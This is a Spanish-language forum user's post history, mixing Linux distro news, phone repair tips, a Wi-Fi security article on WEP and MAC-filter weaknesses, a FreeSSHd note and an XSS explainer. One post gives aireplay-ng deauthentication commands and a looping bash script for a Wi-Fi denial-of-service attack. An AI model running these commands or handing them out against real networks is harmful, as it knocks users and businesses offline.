Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - R3v0lve

#21
Realmente es imposible ser anonimos al 100%, puedes pagar una vpn ,.oh navegar por nodos tor,freenode,oh puedes usar i2p , puedes usar servidores proxy pero nonse garantizs que puede haber filtro de tu informacion
#22
Underc0de / Re:Desafío #4 - Viernes Negro
Febrero 03, 2017, 10:45:17 PM
Bueno, ah buscar como romper  hash creo que eh escuchado hascat
#23
Interesante perspectiva
#24
GNU/Linux / 5 Nuevos Sistema Operativo Linux
Febrero 01, 2017, 12:38:12 PM
SemicodeOS

SemicodeOS es una distribución de Linux especialmente construida para programadores y desarrolladores web. Incluye todos los compiladores, editores de texto, IDE de los lenguajes de programación más populares y herramientas de colaboración para equipos.

Incluso si no eres programador o desarrollador, pero quieres convertirte en uno, SemicodeOS viene con el Scratch IDE para guiarte en tus primeros pasos. Aunque todavía está en beta, esta distribución basada en Sudán seguramente tendrá mucho que ofrecer a la comunidad durante el próximo año.





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Encantamiento

EnchantmentOS es una distribución basada en Xubuntu 16.04 que incluye aplicaciones especialmente seleccionadas con requisitos de poca memoria. Esto lo hace ideal tanto para hardware antiguo como nuevo.

Sigue el mismo ciclo de soporte a largo plazo que Xubuntu y tiene como objetivo proporcionar software Linux confiable y seguro. Además de eso, las aplicaciones integradas que es fácil de usar incluso para personas no técnicas.

Además, su creador se enorgullece de que EnchantmentOS ofrece un gran rendimiento incluso cuando se arranca con unidades flash USB.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Escuelas Linux


Escuelas Linux ("Escuelas de Linux") es una distribución basada en Linux Bodhi que se construye para la educación primaria y secundaria e incluye fuera de la caja una amplia variedad de software educativo. Independientemente de su nombre en español, también ofrece soporte completo en inglés.

Otras características distintivas de Escuelas Linux son un entorno de escritorio ligero y bajos requerimientos de memoria y almacenamiento. Según el sitio web oficial, puede funcionar perfectamente bien con tan bajo como 300 MB de RAM y 20 GB de espacio disponible en el disco duro.




OviOS


As opposed to the previous distributions on this list, OviOS is not a multi-purpose operating system. Rather, it is described as an enterprise level storage OS that is not based on any other distribution but that is fully-compatible with the Linux Standard Base (LSB).

You can use OviOS as a robust storage appliance that can handle a iSCSI, NFS, SMB and / or FTP server. On top of this, the latest OviOS version features replication and high-availability. So what are you waiting to give it a try?









No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



ONL (para abreviar) es una distribución basada en Debian, y (al igual que OviOS) no es un sistema operativo multiuso.

Si usted es un administrador de red, estará encantado de averiguar (si no sabía ya) que puede usar ONL en conmutadores de metal desnudo que de otro modo requerirían un costoso sistema operativo con licencia.

Es importante notar que ONL destaca por la gran variedad de software orientado a red y de metal desnudo incluido fuera de la caja. Listo para intentarlo?
Resumen

Usted notará que todas estas distribuciones se han enviado para revisión durante los últimos meses. Si te gusta alguno de ellos, ve a la página de la lista de espera y haz clic en el botón Recomendar junto al nombre de la distribución. Si lo hace, contribuirá a Distrowatch asignando un recurso para revisarlo.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuentes :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#25
Phreak / Re:[Guia] Recuperar un teléfono mojado
Enero 23, 2017, 12:23:59 PM
Yo recomiendo algo mas tecnico , se desconeta la bateria , nunca cargar, ya que si lo conectan con el cargador puede hacer corto circuito al sumerjilo en arroz no significa que absorve toda la humedad siempre quedan residuos de agua en los circuitos mas abajo de ellos y eso produce zarro ,  sugiere usar alchol isopropilico oh usar limpiador de circuitos se desarma el telefono antes de eso si es smartphone biene conecta directamente la bateria ah la placa se desconecta luego de hacer la accion se comienza limpiar con alchol oh limpiador con un cepillo de dientes oh una brocha luego se calienta con una estacion de calor si aun caso no tienes estacion de calor se puede usar una secadora de pelo ...

Le dejo un post recomendado ..



#26
Diseño UX/UI / Re:Pide tu firma Underc0de!
Enero 23, 2017, 12:22:46 PM
Si aun estan las peticiones Hagame uno

R3v0lve
#27
Debates, Reviews y Opiniones / Re:[WP] Wireless
Enero 23, 2017, 11:39:16 AM
Como Proteger Tu Red Wireless Segun Chema Alonso


Atacar redes Wireless se ha convertido desde hace tiempo en un deporte, una diversión o un hobby. En casi todos los medios de comunicación se han escrito artículos sobre como hackear redes Inalámbricas (yo mismo escribí un artículo sobre esto mismo hace casi 2 años) e incluso en los Microsoft Security Days del año 2005 y la gira de Seguridad Technet fuimos haciendo demostraciones de cómo se puede realizar de forma sencilla un ataque a una red Wireless.

Sin embargo, sigue siendo común que los ataques a redes Wireless tengan éxito. ¿Por qué sucede esto? Justificaciones como ¿Quién me va a atacar a mi? O Si yo no tengo nada importante, me da igual que usen mi red suelen ser reflejo de una falta de conocimiento del riesgo o un problema de conocimiento técnico de cómo se puede securizar una red inalámbrica. Vamos a hacer un rápido repaso a las tecnologías de seguridad en las redes Wireless y viendo los riesgos que tienen cada una de ellas para poder elegir una buena opción a la hora de proteger nuestra red.

La tecnología Wireless

Cualquier conexión que se realice sin cables se considera inalámbrica, pero nosotros nos vamos a centrar en las redes WLan, o redes de área local Wireless. Las redes inalámbricas pueden ser de dos tipos, Ad-hoc, que sería una red entre dos equipos iguales (red de pares) o de Infraestructura, que simularía una conexión de red basada en un Hub o concentrador de conexiones. Esto es importante porque mediatiza los tipos de ataques que se pueden realizar.

Los estándares que gobiernan estas tecnologías son los 802.11 y los primeros que llegaron al público fueron los 802.11b y 802.11g, estándares que permitían velocidades de transmisión desde 11 Mb/s hasta 108 Mb/s. Desde el año 2004 se trabaja en el estándar 802.11n que permitirá implementaciones de hasta 500 Mb/s y que se espera que esté publicado a finales de este año o principios del 2007. Sorprendentemente, al igual que sucedió con la espera del 802.11i (que hablaremos de él un poco más adelante) ya se ha adelantado el mercado y están disponibles a la venta dispositivos 802.11n que se han diseñado siguiendo la información en el borrador [1] del estándar que se aprobó. Para completar algunas de las "letras" que podemos encontrarnos en los estándares, existe la versión 802.11e, pensada para transmisión de video y audio en tiempo real mediante la utilización de protocolos de calidad de servicio.

Vale, hasta aquí información sobre "letras" que nos marcan algunas características de las conexiones, pero no de la seguridad. Sigamos adelante.

Definición de una WLan

Lo primero que debemos definir es el nombre de nuestra red WLan, y para ello unas breves definiciones para aclararnos:

- BSS (Basic Service Set). Se refiere a un conjunto de máquinas que pertenecen a una misma red inalámbrica y que comparten un mismo Punto de Acceo a la red Wireless (AP)
- BSSID (Basic Service Set Identifier): Es el identificador que se usa para referirse a un BSS. Tiene la estructura de dirección MAC y generalmente todos los fabricantes utilizan la dirección MAC del AP. Esto es importante, porque los atacantes descubren este valor para poder identificar los clientes de la red. Para ello, los atacantes buscan en las comunicaciones de red que máquinas se están conectando con ese AP.
- ESS (Extended Service Set). Es un conjunto de BSS que forman una red, generalmente será una Wlan completa.
- SSID (Service Set Identifier): Es el nombre de la Wlan, entendible para el usuario, el que nosotros configuramos: mi_wlan, escrufi o wlan1.
- ESSID (Extender Set Service Identifier): Es el identificador del ESS, es transparente al usuario y lleva la información del SSID.

Al final, cuando configuramos una Wlan, lo que debemos hacer es seleccionar un nombre para nuestro SSID y un canal de radio para la frecuencia de comunicación.

Ocultación SSID

El SSID es necesario para establecer una comunicación, es decir, cuando un cliente se quiere conectar con el AP necesita conocer el SSID de la red. El estándar para wlans permite dos formas de trabajar con el SSID:

- Descubrimiento Pasivo: El cliente recibe una trama baliza (Beacon frame) con la información del SSID. El AP difunde constantemente unas tramas de información con el ESSID donde va la información del SSID de la red.
- Descubrimiento Activo: El cliente tiene que conocer el SSID porque el AP no ofrece beacom Frames.

Esta no es una medida de seguridad ya que descubrir el SSID de una wlan es trivial para un atacante que solo tiene que esperar a que un equipo cliente envíe información para conectarse y ver el SSID.

Pero incluso el hacker no necesita ser paciente y esperar a que un equipo se conecte y puede realizar lo que se llama el ataque 0, es decir, enviar una trama de gestión al cliente, simulando ser el AP (spoofeando la mac de origen) que le pide que se desconecte. El cliente, muy cumplidor con el estándar, se desconecta e intenta conectarse con el siguiente AP del ESS. Si sólo hay un AP, entonces se conectará con el mismo. Durante este proceso el hacker descubrirá el SSID de la wlan.

Conclusión: Activar o no el ESSID Broadcast es una opción de comodidad y/o contaminación del espectro de radio. No es una medida de seguridad.

Protección MAC

Para evitar que se conecten clientes no deseados muchos AP ofrecen opciones para crear listas blancas de equipos que se pueden conectar en función de la dirección MAC de los clientes. Para ello en el AP se añaden las direcciones de las máquinas que queremos permitir y listo.

Esto no es una medida de seguridad robusta pues es bastante fácil de saltar para un atacante. Utilizando cualquier herramienta de análisis de redes wlan com Netstumbler nos descubren los SSID, el canal y frecuencia que está siendo utilizado y la MAC del AP.

Una vez que se conocen las MACs de los AP conocer las Macs de los clientes autorizados es tan sencillo como abrir un Sniffer de red como AiroPeek y ver que direcciones se comunican con la MAC del AP. Esas serán las MACs autorizadas. Cuando ya se tiene la lista de las direcciones autorizadas, pues el atacante se configura una MAC válida con alguna de las muchas herramientas que hay para spoofear(suplantar) direcciones y ya se habrá saltado esa protección.

Conclusión: El filtrado de direcciones MAC no es una buena protección de seguridad, es muy sencillo para un atacante saltarse está protección.

Autenticación y Cifrado


Claves WEP 64 y 128 bits


El estándar 802.11 define un sistema para Autenticación y cifrado de las comunicaciones Wlan que se llama WEP (Wireless Equivalent Privacy).

WEP utiliza una palabra clave que va a ser utilizada para autenticarse en redes WEP cerradas y para cifrar los mensajes de la comunicación.

Para generar la clave, en muchos AP se pide una frase y luego a partir de ella se generan 5 claves distintas para garantizar el máximo azar en la elección de la misma, pero en otros simplemente se pide que se introduzca una con las restricciones de longitud que se configure y listo.

Para el cifrado de cada trama se añadirá una secuencia cambiante de bits, que se llama Vector de Inicialización (IV), para que no se utilice siempre la misma clave de cifrado y descifrado. Así, dos mensajes iguales no generarán el mismo resultado cifrado ya que la clave va cambiando.
Como se puede ver en la imagen, en este caso tenemos un AP que permite generar 5 claves a partir de una Frase o directamente configurara una clave. Cuando tenemos 5 claves, hemos de marcar cual es la que vamos a utilizar porque WEP solo utiliza 1 clave para todo. Como se puede ver hemos seleccionado una opción de clave WEP de 64 bits, de los cuales 5 octetos (40 bits) son la clave y los 24 bits restantes serán el IV. Es decir, en una comunicación normal tendríamos 2 a la 24 claves distintas de cifrado.



En el caso de WEP de 128 bits tendremos 13 octetos fijos (104 bytes) y 24 bits cambiantes (IV), es decir, tendremos el mismo número de claves pero de mayor longitud.

Proceso de Cifrado y Descifrado

Para entender el proceso de autenticación en redes Wlan con WEP es necesario explicar previamente el proceso de cifrado y descifrado ya que es utilizado durante el proceso de autenticación de un cliente.

El proceso de cifrado es el siguiente:

Paso 1: Se elige el IV (24 bits). El estándar no exige una formula concreta.
Paso 2: Se unen la clave Wep y el IV para generar una secuencia de 64 o 128 bits. Este valor se llama RC4 Keystream.
Paso 3: Se pasa esa secuencia por un algoritmo RC4 para generar un valor cifrado de esa clave en concreto.
Paso 4: Se genera un valor de integridad del mensaje a transmitir (ICV) para comprobar que el mensaje ha sido descifrado correctamente y se añade al final del mensaje.
Paso 5: Se hace un XOR entre el mensaje y el RC4 Keystream generando el mensaje cifrado.
Paso 6: Se añade al mensaje cifrado el IV utilizado para que el destinatario sea capaz de descifrar el mensaje.

El proceso de descifrado es el inverso:


Paso 1: Se lee el IV del mensaje recibido
Paso 2: Se pega el IV a la clave WEP
Paso 3: Se genera el RC4 Keystream
Paso 4: Se hace XOR entre el mensaje cifrado y el RC4 KeyStream y se obtiene el mensaje y el ICV.
Paso 5: Se comprueba el ICV para el mensaje obtenido.

Proceso de Autenticación

A la hora de que un cliente se conecte a una Wlan se debe autenticar. Esta autenticación puede ser abierta, es decir, que no hay ninguna medida de exigencia para que pueda asociarse a la red, o cerrada, por la que se va a producir un proceso de reconocimiento de un cliente válido.

Así, en una autenticación WEP se usa una idea muy sencilla. Si tienes la clave WEP serás capaz de devolverme cifrado lo que te envíe. Así, el cliente pide conectarse y el AP genera una secuencia de 128 octetos que le envía al cliente cifrado. El cilente descifra esa cadena de 128 octetos y se la devuelve en otra trama cifrada con otro IV. Para que la autenticación sea mutua se repite el proceso de forma inversa, es decir, enviando el AP la petición de conexión al cliente y repitiéndose el envío de la cadena de 128 octetos cifrados del cliente al AP.

Seguridad WEP

¿Es seguro utilizar WEP entonces? Pues la verdad es que no. Hace ya años que se demostró que se podía romper y hoy en día romper un WEP es bastante trivial y en cuestión de minutos se consigue averiguar la clave WEP. El atacante solo tiene que capturar suficientes tramas cifradas con el mismo IV; la clave WEP va en todos los mensajes, así qué, si se consiguen suficientes mensajes cifrados con el mismo IV se puede hacer una interpolación matemática y en pocos segundos se consigue averiguar la clave WEP. Para conseguir suficientes mensajes cifrados con el mismo IV el atacante puede simplemente esperar o generar muchos mensajes repetidos mediante una herramienta de inyección de tráfico. Hoy en día, para los atacantes es muy sencillo romper el WEP porque existen herramientas gratuitas suficientemente sencillas como para obviar el proceso que realizan para romper el WEP.



Pero incluso aquí en España, donde hay un grupo de investigación sobre el tema de seguridad Wireless (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) se han desarrollado herramientas con GUI para que sean más sencillitas.



Una vez que han generado un fichero de capturas suficiente se pasa por el crackeador que va a devolver la clave WEP que está siendo utilizada.



WLanDecrypter




Una especificación concreta de las redes WEP se ha producido en España. Una compañía de televisión por Internet instala en sus clientes siempre redes Wireless a las que configura, como SSID un valor del tipo: WLAN_XX.

Estas redes utilizan un sistema de claves WEP sencillo que ha sido descubierto. La clave esta compuesta con la primera letra de la marca del router utilizado en mayúsculas (Comtrend, Zyxel, Xavi) y la MAC de la interfaz WAN del router. Además el nombre de la red es WLAN_XX donde XX son los dos últimos dígitos de la dirección MAC de la interfaz WAN. Como cada router tiene una asociación entre el fabricante de la interfaz wireless y de la interfaz WAN, puesto que se hacen en serie y con las mismas piezas, si sabemos la MAC de la interfaz wireless también sabremos los 3 primeros pares de dígitos hexadecimales de la MAC WAN (que corresponden al fabricante).

En definitiva, con una herramienta sencilla y una captura de 1 mensaje de red en pocos segundos se rompe la clave WEP de este tipo de redes. Hasta que las empresas cambien su política.


Direccionamiento de Red

Para un atacante, encontrar el direccionamiento de red que tiene que utilizar en una wlan en la que se ha colado es también un paso trivial:

- La red cuenta con servidor DHCP: el equipo del atacante será configurado automáticamente y no tendrá que hacer nada. En el caso de que haya suplantado una dirección MAC de un cliente, el atacante no podrá utilizar esta dirección IP porque ya está siendo utilizada por otro (ya que el servidor DHCP asigna direcciones en función de direcciones MAC), pero le servirá para ver el rango de direccionamiento que puede utilizar y la puerta de enlace.

- La red con cuenta con DHCP: El cliente se conecta con una dirección IP no valida y realiza capturas de la red con un sniffer (Wireshark, Ethereal, AiroPeek, ...). En una captura con tráfico verá rápidamente cuales son las direcciones IP que se están utilizando. Para averiguar la puerta de enlace solo tendrá que buscar una comunicación entre un equipo interno con una IP externa. Ese mensaje, obligatoriamente ha sido enviado a la puerta de enlace, luego la MAC destino de ese mensaje será la MAC de la puerta de enlace. Basta utilizar los comandos ARP para averiguar la IP asociada a esa MAC.

802.11i, WPA y WPA2

Visto lo visto, todo el mundo sabía que había que hacer algo con la seguridad en las redes Wireless. La única solución que se planteaba con este panorama consistía en realizar conexiones VPNs desde el cliente que se quiere conectar a una Wlan hasta un servidor en la red para conseguir cifrar las conexiones, es decir, tratar la Wlan como una red insegura, como Internet, y realizar un cifrado y una autenticación por encima con los mecanismos que nos ofrecen los servidores de VPN.

El IEEE 802.11 anunció una nueva versión segura para Wlan que se llamaría 802.11i y cambiaría los protocolos de seguridad de las Wlans. Como el proceso de aprobación de un estándar era largo y el mercado necesitaba una solución rápida, un grupo de empresas, reunidas bajo la organización Wi-Fi Alliance crearon WPA (Wireless Protected Access) como una implementación práctica de lo que sería el próximo estándar 802.11i.

Así que el próximo mes veremos los mecanismos de seguridad en estos entornos y como montar infraestructuras seguras con WPA, con Certificados digitales, con PEAP, etc... Hasta el mes que viene.

Fuente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#28
Debates, Reviews y Opiniones / Re:[WP] Wireless
Enero 23, 2017, 11:26:34 AM
Ataque DoS WiFi




Aclaremos que podemos hacerlo atacando de forma que nadie pueda conectarse, o solamente a un determinado cliente.

Podemos usar Backtrack 5 R3 (como no) para proceder a este ataque. Comentar que esto solo es a modo educativo y que el ataque unicamente será en nuestra propia red.

Para empezar debemos poner nuestra tarjeta wifi en modo monitor. Para ello usaremos el comando:

   
Código: php
airmon-ng start wlan0


Debemos saber en que canal opera la red a atacar y ponemos airmon-ng en ese canal de la siguiente forma:

   
Código: php
 airmon-ng -c 11 mon0


En nuestro caso, la wifi de pruebas está en el canal 11 y la interfaz en modo monitor nuestra es mon0. Puede variar el canal y la interfaz.

Ahora viene la auténtica chicha. Vamos a hacer el ataque DoS a la red wireless. Para ello y usando aireplay-ng vamos a enviar paquetes de desautentificación de forma infinita a nuestro punto de acceso.

   
Código: php
aireplay-ng -0 0 -a 11:22:33:44:55 mon0


Aclarar que con " -0 0 " son los paquetes infinitos, y que 11:22:33:44:55 es la mac del punto wifi.

Para hacer el ataque a un cliente, los pasos son casi iguales añadiendo una pequeña opción.
Código: php

    aireplay-ng -0 0 -a 11:22:33:44:55 -c 00:11:22:33:44 mon0


Ya sabemos cual es la MAC de la Wifi. La del cliente es 00:11:22:33:44.

Con esto, anulamos por completo cualquier intento de conexión a la Wifi o de un cliente determinado a la wifi. Ocasionando muchísimas molestias y en el caso de empresas, no dejando trabajar por línea inalámbrica.

Por la red pude recuperar un script de "Abdulà Aleid" el cual agiliza mucho el proceso y lo hace mas efectivo ya que manda 100 paquetes de desautentificación con la salvedad de que es un bucle infinito, saturando mucho mas la red wifi.

Os dejo el código original del script:
Código: php


    echo -n -e '\E[37;41m'"Enter Interface: "; tput sgr0
    read int
    echo '—>'
    echo -n -e '\E[37;41m'"Enter Target AP Bssid: "; tput sgr0
    read bsid
    echo '—>'
    echo -n -e '\E[37;41m'"Enter Target AP channel: "; tput sgr0
    read chn
    iwconfig $int channel $chn
    echo '—>'
    echo -n -e '\E[37;41m'"Enter Target Connected Client: "; tput sgr0
    read cli
    echo '—>'

    rm /home/cut.sh &>/dev/null;
    echo "'for (( ; ; ))
    do
      aireplay-ng -a '$bsid' -c '$cli' -0 100 '$int'
     
    done
    "' >> /home/cut.sh
    xterm -geometry 70×12-1-1 -T "killing progress" -bg red -e "sh /home/cut.sh"



Guardalo extension .sh  si es necesario setearlos permisos como chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y luego lo ejecutas y listo

Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Debates, Reviews y Opiniones / Re:[WP] Wireless
Enero 23, 2017, 11:19:46 AM

¿Qué es wireless?


Wireless (inalámbrico o sin cables) es un término usado para describir las telecomunicaciones en las cuales las ondas electromagnéticas (en vez de cables) llevan la señal sobre parte o toda la trayectoria de la comunicación. Algunos dispositivos de monitorización, tales como alarmas, emplean ondas acústicas a frecuencias superiores a la gama de audiencia humana; éstos también se clasifican a veces como wireless. Los primeros transmisores sin cables vieron la luz a principios del siglo XX usando la radiotelegrafía (código Morse). Más adelante, como la modulación permitió transmitir voces y música a través de la radio, el medio se llamó radio. Con la aparición de la televisión, el fax, la comunicación de datos, y el uso más eficaz de una porción más grande del espectro, se ha resucitado el término wireless.

Ejemplos comunes de equipos wireless en uso hoy en día incluyen:

    Teléfonos móviles, que permiten colectividad entre personas.
    El sistema de posicionamiento global (GPS), que permite que coches, barcos y aviones comprueben su localización en cualquier parte de la tierra.
    Periféricos de ordenador wireless, como el ratón, los teclados y las impresoras, que se pueden también conectar a un ordenador vía wireless.
    Teléfonos inalámbricos, de más corto alcance que los teléfonos móviles.
    Mandos a distancia (para televisión, vídeo, puertas de garaje, etc.) y algunos sistemas de alta fidelidad.
    Monitores para bebés, estos dispositivos son unidades de radio simplificadas que transmiten/reciben dentro de una gama limitada.
    Televisión vía satélite, permiten que los espectadores, desde casi cualquier parte, seleccionen entre centenares de canales.
    LANs wireless o local área networks, proporcionan flexibilidad y fiabilidad para usuarios de ordenadores.

La tecnología wireless se está desarrollando rápidamente, y cada vez está más presente en la vida de gente de todo el mundo. Además, cada vez más gente confía en ésta tecnología directa o indirectamente.

Otros ejemplos más especializados y más exóticos de comunicaciones vía wireless son:

    Procesadores de tarjetas de crédito inalámbricos (wireless credit card processors): son pequeños aparatos para pasar tarjetas de crédito y realizar cobros vía wireless.
    Global System for Mobile Communication (GSM): es el sistema digital telefónico para teléfonos móviles usado en Europa y otras partes del mundo.
    General Packet Radio Service (GPRS): servicio de comunicación vía wireless basado en paquetes que proporciona conexión continua a Internet para usuarios de teléfonos móviles y de ordenadores.
    Enhanced Data GSM Environment (EDGE): es una versión más rápida del servicio wireless Global System for Mobile (GSM).
    Universal Mobile Telecommunications System (UMTS): sistema de banda ancha, basado en paquetes, que ofrece servicios a usuarios de computadoras y de teléfonos móviles sin importar dónde estén situados en el mundo.
    Wireless Application Protocol (WAP): sistema de protocolos de comunicación para estandarizar la forma en que los dispositivos wireless acceden a Internet.
    i-Mode: el primer teléfono inteligente del mundo para navegar por Internet. éste teléfono, introducido en Japón proporciona color y vídeo.

Routers Inalámbricos

Un router inalámbrico o router wireless es un dispositivo de red que desempeña las funciones de un router pero también incluye las funciones de WAP o AP (wireless access Point - punto de acceso inalámbrico). Normalmente se usa para permitir el acceso a Internet o a una red de computadoras sin la necesidad de una conexión con cables. Puede funcionar en una LAN (local area network - red de área local) con cable, en una WLAN (wireless local area network - red de área local sin cables), o en una red mixta con cable/sin cable.

La mayoría de los routers inalámbricos tienen las siguientes características:


    Puertos LAN, que funcionan de la misma manera que los puertos de un conmutador/interruptor de red.
    Un puerto WAN, para conectar a una área más amplia de red. Las funciones de enrutamiento se filtran usando este puerto. Si este no se usa, muchas funciones del router se circunvalarán.
    Antena wireless. Permiten conexiones desde otros dispositivos sin cable como pueden ser las NICs (network interface cards - tarjetas de red), repetidores wireless, puntos de acceso inalámbrico (WAP o AP), y puentes wireless.

Hay varias tecnologías de transmisión inalámbricas que se diferencian entre sí por su potencia, las frecuencias y los protocolos con los que trabajan.

Algunos de estos routers son Wi-Fi, UMTS, GPRS, Edge, WiMAX, o Fritz!Box, que permiten realizar una interfaz entre redes fijas y móviles. En WiFi estas diferencias se denominan como clase a/b/g/ y n.
Wi-Fi

El router inalámbrico más popular es el WiFi por ser el más utilizado para acceder a Internet desde cualquier lugar donde haya un punto de acceso (Access Point o AP), sobre todo en portátiles y PDAs con tarjeta WiFi. También conocido como 802.11, es el dispositivo que reúne el conjunto de estándares para la WLAN (Wireless Local Area Network - red de área local inalámbrica). El estándar IEEE 802.11 es una frecuencia de radio desarrollado por el IEEE (Institute of Electrical and Electronics Engineers - Instituto de Ingenieros Eléctricos y Electrónicos), y la mayoría de los sistemas operativos lo soportan, así como muchos de los portátiles, celulares/móviles de última generación, consolas, impresoras y otros periféricos.

Los tipos de comunicación WIFI se basan en las diferentes clases de estándares IEEE, siendo la mayoría de los productos de la especificación b y de la g:

    802.11a
    802.11b
    802.11g
    802.11n

802.11a

Emite a una velocidad de 54 Mb/seg (megabytes por segundo)

Volumen de información (Throughput) de 27 Mb/seg

Banda de frecuencia de 5 GHz

El IEEE creaba en 1997 el estándar 802.11 con velocidades de transmisión de 2Mb/seg, hasta que en 1999 desarrollaron el estándar 802.11a que era una revisión del estándar original y que utiliza el mismo juego de protocolos de base que este. También llamado WiFi 5, el estándar 802.11a opera en la banda de 5 Ghz que está menos congestionada y utiliza la modulación OFDM (orthogonal frequency-division multiplexing) con 52 subportadoras, lo que le infiere dos notables ventajas respecto al 802.11b: incrementa la velocidad máxima de transferencia de datos por canal (de 11 Mbps a 54 Mbps) y aumenta el número de canales sin solapamiento.

Pero el uso de esta banda también tiene sus desventajas, puesto que restringe el uso de los equipos 802.11a sólo a puntos en línea de vista, siendo necesario la instalación de un mayor número de puntos de acceso 802.11a para cubrir la misma zona; debido a esto las ondas no pueden penetrar tan lejos como los del estándar 802.11b, ya que estas son más fácilmente absorbidas por las paredes y otros objetos sólidos en su camino pues su longitud de onda es menor.
802.11b

Emite a una velocidad de 11 Mb/seg

Volumen de información (Throughput) de 5 Mb/seg

Banda de frecuencia de 2,4 GHz

Uno de los más usados, desarrollado en 1999, es una extensión directa de la técnica de modulación definida en el estándar original 802.11. Su espectacular incremento en throughput (volumen de información que fluye a través de las redes de datos) comparado con el estándar original junto con sustanciales reducciones de precios ha llevado a la rápida aceptación de 802.11b como la tecnología inalámbrica LAN definitiva.

Como desventaja los dispositivos 802.11b sufren interferencias de otros productos operando en la banda 2.4 GHz, como pueden ser hornos microondas, dispositivos Bluetooth, monitores de bebés y teléfonos inalámbricos. Por otro lado, los productos de estándar 802.11b no son compatible con los productos de estándar 802.11a por operar en bandas de frecuencia distintas.
802.11g

Emite a una velocidad de 54 Mb/seg

Volumen de información (Throughput) de 22 Mb/seg

Banda de frecuencia de 2.4 GHz


Desarrollado en 2003, el 802.11g es el tercer estándar de modulación y la evolución del 802.11b, es además el más usado en la actualidad. Los productos IEEE 802.11g poseen un alto grado de compatibilidad con versiones anteriores pues trabaja en la banda de 2.4 GHz como 802.11b, pero usa el mismo esquema de transmisión basado en OFDM como 802.11a, utilizando 48 subportadoras.

802.11g fue rápidamente adoptado por los consumidores en Enero de 2003, antes de su ratificación en Junio, debido al deseo de velocidades de transmisión superiores y reducciones en los costes de fabricación. Para el verano de 2003, la mayoría de los productos de doble banda 802.11a/b pasaron a ser dual-band/tri-mode (doble banda/tres modos), esto quiere decir que pueden funcionar en la banda de 2.4 GHz o de 5 GHz y en cualquiera de los tres modos aceptados por la IEEE: el a, b y g.

Como el estándar 802.11b, los dispositivos de estándar 802.11g les afectan las interferencias de otros productos operando en la banda de 2.4 GHz.
802.11n

Emite a una velocidad de 600 Mb/seg

Volumen de información (Throughput) de 144 Mb/seg

Bandas de frecuencia: 2,4 GHz y 5 GHz

El estándar 802.11n (todavía en desarrollo) es una ratificación que mejora los previos estándares 802.11 añadiendo la tecnología MIMO que son antenas Multiple-Input Multiple-Output, unión de interfaces de red (Channel Bonding), además de agregación de marco a la capa MAC.

    MIMO genera cuatro canales de tráfico simultáneos de 72.2 Mbps para enviar y recibir datos a través de la incorporación de varias antenas.
    Channel Bonding, también conocido como canal 40 MHz, puede usar simultáneamente dos canales separados no superpuestos de 20 MHz, lo que permite incrementar enormemente la velocidad de datos transmitidos.
    Uso simultáneo de las bandas de frecuencia de 2,4 Ghz y de 5,4 Ghz que hace que sea compatible con dispositivos basados en todas las ediciones anteriores de Wi-Fi.

La velocidad real de transmisión se prevee que podría llegar a los 600 Mbps, que es 10 veces más rápida que bajo los estándares 802.11a y 802.11g, y cerca de 40 veces más rápida que bajo el estándar 802.11b.

Se espera que 802.11n se apruebe por la IEEE-SA RevCom en noviembre de 2009, aunque ya hay dispositivos que ofrecen de forma no oficial éste estándar.

Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#30
Windows / Re:Freesshd Windows SSH
Enero 22, 2017, 03:47:24 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Se agradece el post, pero leyéndolo encuentro a faltar algo sobre "FreeSSHd" (en que consiste y cual es el objetivo de la herramienta)

Saludos

El servidor SSH servirá para ejecutar cualquier comando en la consola de Windows (cmd.exe), aunque también podremos pasar archivos mediante SCP ya sea con comandos o a través de WinSCP (recomendado), el cliente SSH que usaremos será Putty o la consola de cualquier GNU/Linux.

El servidor SFTP servirá para pasar archivos por internet y en LAN de forma segura, cifrando todo el tráfico, en el ejemplo que os pondré, usaré WinSCP que también es compatible con SFTP, es un programa fundamental que no debe faltar en vuestros equipos.
#31
Debates, Reviews y Opiniones / Re:[WP] SQLi || XSS
Enero 22, 2017, 03:29:12 PM

¿Qué es y cómo opera un ataque de Cross-Site Scripting (XSS)?



    Definición
    Tipos de ataques
    Consideraciones
    PDF XSS
    XSRF

Definición

XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede realizarse a sitios web, aplicaciones locales e incluso al propio navegador.

Sucede cuando un usuario mal intencionado envía código malicioso a la aplicación web y se coloca en forma de un hipervínculo para conducir al usuario a otro sitio web, mensajería instantánea o un correo electrónico. Así mismo, puede provocar una negación de servicio (DDos).




Generalmente, si el código malicioso se encuentra en forma de hipervínculo es codificado en HEX (basado en el sistema de numeración hexadecimal, base 16) o algún otro, así cuando el usuario lo vea, no le parecerá sospechoso. De esta manera, los datos ingresados por el usuario son enviados a otro sitio, cuya pantalla es muy similar al sitio web original.

De esta manera, es posible secuestrar una sesión, robar cookies y cambiar la configuración de una cuenta de usuario.

Tipos de ataques


Las diversas variantes de esta vulnerabilidad pueden dividirse en dos grandes grupos: el primero se conoce como XSS persistente o directo y el segundo como XSS reflejado o indirecto.

Directo o persistente. Consiste en invadir código HTML mediante la inclusión de etiquetas <script> y <frame> en sitios que lo permiten.

Local. Es una de las variantes del XSS directo, uno de sus objetivos consiste en explotar las vulnerabilidades del mismo código fuente o página web. Esas vulnerabilidades son resultado del uso indebido del DOM (Modelo de Objetos del Documento, es un conjunto estandarizado de objetos para representar páginas web) con JavaScript, lo cual permite abrir otra página web con código malicioso JavaScript incrustado, afectando el código de la primera página en el sistema local. Cuando el XSS es local, ningún código malicioso es enviado al servidor. El funcionamiento toma lugar completamente en la máquina del cliente, pero modifica la página proporcionada por el sitio web antes de que sea interpretada por el navegador para que se comporte como si se realizara la carga maliciosa en el cliente desde el servidor. Esto significa que la protección del lado del servidor que filtra el código malicioso no funciona en este tipo de vulnerabilidad.

